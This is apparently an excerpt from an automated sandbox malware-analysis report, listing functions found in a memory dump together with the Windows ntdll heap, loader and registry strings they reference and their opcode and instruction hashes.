                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                  • API String ID: 0-318774311
                                                  • Opcode ID: c8c812eb718a3b09d4a222fb8bd961a2d9c5f3ffe9db322ecdb9a67a592d396e
                                                  • Instruction ID: 73c8dcfad28c0292e8824e103387adbf22992767593fba52949ecdabb9fecdc2
                                                  • Opcode Fuzzy Hash: c8c812eb718a3b09d4a222fb8bd961a2d9c5f3ffe9db322ecdb9a67a592d396e
                                                  • Instruction Fuzzy Hash: 9C81BF75608350AFE315CB25C841B6BBBE8FF84B54F4409ADF9849B290DB75DE40CB92
                                                  Function 36017090 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                  • API String ID: 0-3870751728
                                                  • Opcode ID: e42bfa9743810666bf5ea421f060e008685b21c1399ec5cda4231e7fc805c874
                                                  • Instruction ID: ea954a18b237a3cbe796e218c3a278eba1e97cb3f9ae3d414519e7a1ac6f8c0c
                                                  • Opcode Fuzzy Hash: e42bfa9743810666bf5ea421f060e008685b21c1399ec5cda4231e7fc805c874
                                                  • Instruction Fuzzy Hash: 93914FB4E006159FEB14CF59C885B9DBBF1FF48304F2481AAE904AB351E7759942CF90
                                                  Function 35F9B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                  • API String ID: 0-373624363
                                                  • Opcode ID: 8f8b594a5c7e22a8193501b468e721a46a72df6eed983298c24095ffaa213b5f
                                                  • Instruction ID: 5249df343cfae5939f7ed174943bfbc20cc011d00e702e4febc3b51572cf1408
                                                  • Opcode Fuzzy Hash: 8f8b594a5c7e22a8193501b468e721a46a72df6eed983298c24095ffaa213b5f
                                                  • Instruction Fuzzy Hash: 7691DFB6A08B49CBEB19CF58C840BEDB7B5FF40354F144999E801AB3D4D7799A80CB91
                                                  Function 3606B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3606B3AA
                                                  • GlobalizationUserSettings, xrefs: 3606B3B4
                                                  • TargetNtPath, xrefs: 3606B3AF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                  • API String ID: 0-505981995
                                                  • Opcode ID: e364e33cac83ea0976326c6eb188f701ae0289ada57f82374dfe3b22066660d8
                                                  • Instruction ID: add4b2adef3aab541623019be90228373c51f5e2594f17a766cffef4a15b8070
                                                  • Opcode Fuzzy Hash: e364e33cac83ea0976326c6eb188f701ae0289ada57f82374dfe3b22066660d8
                                                  • Instruction Fuzzy Hash: 906190B2D41229ABDB21DF56DC89BD9BBB8EB04714F4101E5E908A7250DB74DE84CF90
                                                  Function 35F8F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • HEAP[%wZ]: , xrefs: 35FEE435
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 35FEE455
                                                  • HEAP: , xrefs: 35FEE442
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  • Opcode ID: dddb51edd639edfdd6b65f4e54176a422dc312d9f89844cdb93c27f56f83a199
                                                  • Instruction ID: 8c97b015ea1c2a44e8e81e66d8ba05da7e8ebbdfcda7afe60c8af7908402f2e4
                                                  • Opcode Fuzzy Hash: dddb51edd639edfdd6b65f4e54176a422dc312d9f89844cdb93c27f56f83a199
                                                  • Instruction Fuzzy Hash: 63511336744784AFF312CBA8C884F9ABBF8FF04748F0448A5E6518B692D774E940CB51
                                                  Function 35FB1514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • minkernel\ntdll\ldrmap.c, xrefs: 35FFA3A7
                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 35FFA396
                                                  • LdrpCompleteMapModule, xrefs: 35FFA39D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  • Opcode ID: 92a1f327b2dbaf4ef0bf245899e2c6fe50256be77f3a06f234e4bec0e707c101
                                                  • Instruction ID: 09dfe7f3f6097e8a1f55d3422783bd1ab480403d09144890dc68bc55ac4c2bbe
                                                  • Opcode Fuzzy Hash: 92a1f327b2dbaf4ef0bf245899e2c6fe50256be77f3a06f234e4bec0e707c101
                                                  • Instruction Fuzzy Hash: 9B511479A04781DBEB11DB69C944F0A77E5BF00B54F100E94ED939BAE1DBB1EA00CB41
                                                  Function 3603D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • HEAP[%wZ]: , xrefs: 3603D792
                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3603D7B2
                                                  • HEAP: , xrefs: 3603D79F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                  • API String ID: 0-3815128232
                                                  • Opcode ID: daa702d7d98b5df0beab661713f632d7680fb2dc61c12e8ea420f008877ad343
                                                  • Instruction ID: a3e75d3f79609cbebf3ebd6167eacb009a302cb99262dd7982cc90f8fef2e94c
                                                  • Opcode Fuzzy Hash: daa702d7d98b5df0beab661713f632d7680fb2dc61c12e8ea420f008877ad343
                                                  • Instruction Fuzzy Hash: 015116795123608AF351CB2AC4427767BE2EF4528AF714CC9E4F58B1C1E636D487DBA0
                                                  Function 35F8753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                  • API String ID: 0-1151232445
                                                  • Opcode ID: ba729bc62f43f7092ae72fb0802b44e5430a5ea8a03ddad5e431449a99edf42e
                                                  • Instruction ID: 7b0b112c5b90d78d6214fb7d1f94ec0684d052c6349239d1e87684bcf7aa2992
                                                  • Opcode Fuzzy Hash: ba729bc62f43f7092ae72fb0802b44e5430a5ea8a03ddad5e431449a99edf42e
                                                  • Instruction Fuzzy Hash: 274188792053508FEB26CF18C4C8B6577EABF01345F644CAAC8C68F66ACB76D485CB21
                                                  Function 35FC15EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 36001954
                                                  • LdrpAllocateTls, xrefs: 3600194A
                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36001943
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-4274184382
                                                  • Opcode ID: b1e9bdb9dfdee9ab1493f9c0676a764b203d6883663f64b7624500f67abaff84
                                                  • Instruction ID: b8ca3a924698db1266f0960623afab9fe77c0afcebdcaae79de23eced4309593
                                                  • Opcode Fuzzy Hash: b1e9bdb9dfdee9ab1493f9c0676a764b203d6883663f64b7624500f67abaff84
                                                  • Instruction Fuzzy Hash: 0B416DB5A00609EFEB15CFA9C841AAEBBF6FF48300F0449A9E405A7251DB75A911CF90
                                                  Function 36023CD4 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                  • API String ID: 0-1373925480
                                                  • Opcode ID: ad99c6478f94c215a620786c7ac0fa3503a577269bbc191462b3f144e41d143c
                                                  • Instruction ID: 54b3459ea7afcd2f8c0386a6cd669ca3e51a3879815af9a9eab81738666e936d
                                                  • Opcode Fuzzy Hash: ad99c6478f94c215a620786c7ac0fa3503a577269bbc191462b3f144e41d143c
                                                  • Instruction Fuzzy Hash: D841E076A04394CFEB19DBA5E941B9DBBF8EF45744F20049AD800EF391EB348941CB51
                                                  Function 35FC32C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RtlCreateActivationContext, xrefs: 36002803
                                                  • SXS: %s() passed the empty activation context data, xrefs: 36002808
                                                  • Actx , xrefs: 35FC32CC
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                  • API String ID: 0-859632880
                                                  • Opcode ID: ef05987374c048f515de12b44cf1f90122ddc7c870801c14d117f3edbcb5df99
                                                  • Instruction ID: 01e88ef1ffd2159a94553c3c9da3ab99acbc7dd30df3522278f68cec6a7f5323
                                                  • Opcode Fuzzy Hash: ef05987374c048f515de12b44cf1f90122ddc7c870801c14d117f3edbcb5df99
                                                  • Instruction Fuzzy Hash: 46311076A403069BEB01CF59D8C1B9A3BA4EB44794F5148B9EC059F281CBB0D909CBD1
                                                  Function 3601B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • GlobalFlag, xrefs: 3601B30F
                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3601B2B2
                                                  • @, xrefs: 3601B2F0
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                  • API String ID: 0-4192008846
                                                  • Opcode ID: 2a1525c37a9d9e554332f51c61674367276c8e4f4d491af9c74b56dc1da7b590
                                                  • Instruction ID: e2cd619ab239a92ae57f2855db3bc4efe853aa9c7b2b7899eca65ab0b65279b4
                                                  • Opcode Fuzzy Hash: 2a1525c37a9d9e554332f51c61674367276c8e4f4d491af9c74b56dc1da7b590
                                                  • Instruction Fuzzy Hash: BF315DB5E00209AFDB10DF95DC81BEEBBBCEF44744F4408A9E601A7241D7749E05CB90
                                                  Function 35FC1527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • DLL "%wZ" has TLS information at %p, xrefs: 3600184A
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 3600185B
                                                  • LdrpInitializeTls, xrefs: 36001851
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-931879808
                                                  • Opcode ID: 39070f5f30a068a3ef2cbb1c2a06a8fa44e94c48eb6eeb32577b14b8f19fc557
                                                  • Instruction ID: 8e2af347c5c93aea4b4ed781a8a6db5c98eafc3e5546449ab3db410a071f0bb4
                                                  • Opcode Fuzzy Hash: 39070f5f30a068a3ef2cbb1c2a06a8fa44e94c48eb6eeb32577b14b8f19fc557
                                                  • Instruction Fuzzy Hash: 9E31F372A10346AFF715DA95C842F5A7BB9AF40384F010CF9E602B7180DBB0ED558B90
                                                  Function 35FD1190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 35FD119B
                                                  • @, xrefs: 35FD11C5
                                                  • BuildLabEx, xrefs: 35FD122F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 0-3051831665
                                                  • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                  • Instruction ID: 71d4034db9f1751347f855ab98a3236ad887e486b4c36531aef3c386a5fc8201
                                                  • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                  • Instruction Fuzzy Hash: 07318F72A00659BBDB12DB95CC44EAFFBBDEB84750F144825E504A72A4D731DA05CBA0
                                                  Function 35FA51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@
                                                  • API String ID: 0-149943524
                                                  • Opcode ID: fcf8d0e8250f37b084dbbfd39eecf19bca188043039ac3126e0c154b5c44b91e
                                                  • Instruction ID: b2bd76862994454caf03264524e4c5b71d8a7a25ed6d84e2f3c4fbc018dbb081
                                                  • Opcode Fuzzy Hash: fcf8d0e8250f37b084dbbfd39eecf19bca188043039ac3126e0c154b5c44b91e
                                                  • Instruction Fuzzy Hash: F9326BBA6083118BDB14CF14C480A3EB7F6BF88744F504D2EE996976A0EB75D944CB93
                                                  Function 35F95622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: ee60e671be07cd3be2165eef6bf1f5728decabde63aa6a6534f96a4dcb1b9b97
                                                  • Instruction ID: 08f625489d2b7a3251e485195ca63af8284f8ced84dd9a631938e1e00f7b95d1
                                                  • Opcode Fuzzy Hash: ee60e671be07cd3be2165eef6bf1f5728decabde63aa6a6534f96a4dcb1b9b97
                                                  • Instruction Fuzzy Hash: 9E31A035305B42EBE749DB65CA40E9AFB7ABF84754F404825E90147A60DBB1E821CFD0
                                                  Function 36019567 Relevance: 3.1, APIs: 2, Instructions: 62timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 176067137f0e49265057ab03f2aeab9befb60ff46957010b586e3e800cd2b297
                                                  • Instruction ID: ff4705dc0c5ad573915b5cff0c4afc85c8052997bc6806e1e083676074d94b06
                                                  • Opcode Fuzzy Hash: 176067137f0e49265057ab03f2aeab9befb60ff46957010b586e3e800cd2b297
                                                  • Instruction Fuzzy Hash: 4911E775B14219ABEB09DB5CC986A5EBBF9EB88764F2101A9E546F3300DA709D00C794
                                                  Function 36059ED2 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `$`
                                                  • API String ID: 0-197956300
                                                  • Opcode ID: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                  • Instruction ID: 4d4e11120338dfdc4d66204b4bd971723501a3602a77dc81cb9877e08c484072
                                                  • Opcode Fuzzy Hash: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                  • Instruction Fuzzy Hash: 1CC10F716083429BE714CF2AC842B1BBFE5BFC4358F014A6DFA95DA290D7B5D944CB82
                                                  Function 3601174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$AddD
                                                  • API String ID: 0-2525844869
                                                  • Opcode ID: dae0b5846333ff938208c4a781545132d403699a287e4bd2a052ce04111c4ba2
                                                  • Instruction ID: aa72ca5b5edf3b8d991b1a90e5015d9da48fd66daf0bcf56f2fb7684f543fd21
                                                  • Opcode Fuzzy Hash: dae0b5846333ff938208c4a781545132d403699a287e4bd2a052ce04111c4ba2
                                                  • Instruction Fuzzy Hash: 09A19E7A604304AFE308CB11C845BABBBF9FF84704F544AAEF99486250E770E909CB52
                                                  Function 3606B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RedirectedKey, xrefs: 3606B60E
                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3606B5C4
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                  • API String ID: 0-1388552009
                                                  • Opcode ID: 553cfeddd06e3f9a1e685f6bbef7932e8da17e90970efa1bac56cdd3a4ab3970
                                                  • Instruction ID: 68b3a2c45b9ae933b4389f57a5dff16ed692f8d8456e4a246a184f2d0d2a1eba
                                                  • Opcode Fuzzy Hash: 553cfeddd06e3f9a1e685f6bbef7932e8da17e90970efa1bac56cdd3a4ab3970
                                                  • Instruction Fuzzy Hash: F061E5B5C11219EBDF11DF96C889ADEBFB9FB08714F5040AAE505E7240EB349A45CF90
                                                  Function 35FAF640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$
                                                  • API String ID: 3446177414-233714265
                                                  • Opcode ID: 99126630fbaa61a432048e6154dce070fbb12d3f55898aa79e4a809b86ce036a
                                                  • Instruction ID: 98a2e5b30e1ba465a41a9664d4ce5a08a01a10547169555237db9a5cdde2d176
                                                  • Opcode Fuzzy Hash: 99126630fbaa61a432048e6154dce070fbb12d3f55898aa79e4a809b86ce036a
                                                  • Instruction Fuzzy Hash: 7661BF7AA00749CBEB21DFA4C580B9DB7B2FF44704F104C69D505AF690CB75A981CF92
                                                  Function 3602314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                  • API String ID: 0-118005554
                                                  • Opcode ID: c1831b6d4fcca806b441d429b5c9027c90f768e8ad3ed0c9f44fec0728d2346d
                                                  • Instruction ID: bbfede972bca0e04aacc89b047e56acdbbb2f8191c71e104cf08350ff40018f6
                                                  • Opcode Fuzzy Hash: c1831b6d4fcca806b441d429b5c9027c90f768e8ad3ed0c9f44fec0728d2346d
                                                  • Instruction Fuzzy Hash: D631F0B62087409FE309CB69D846B1ABBF4EF84714F0408A9FC548B3D0EB31D949CB92
                                                  Function 35FC31BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
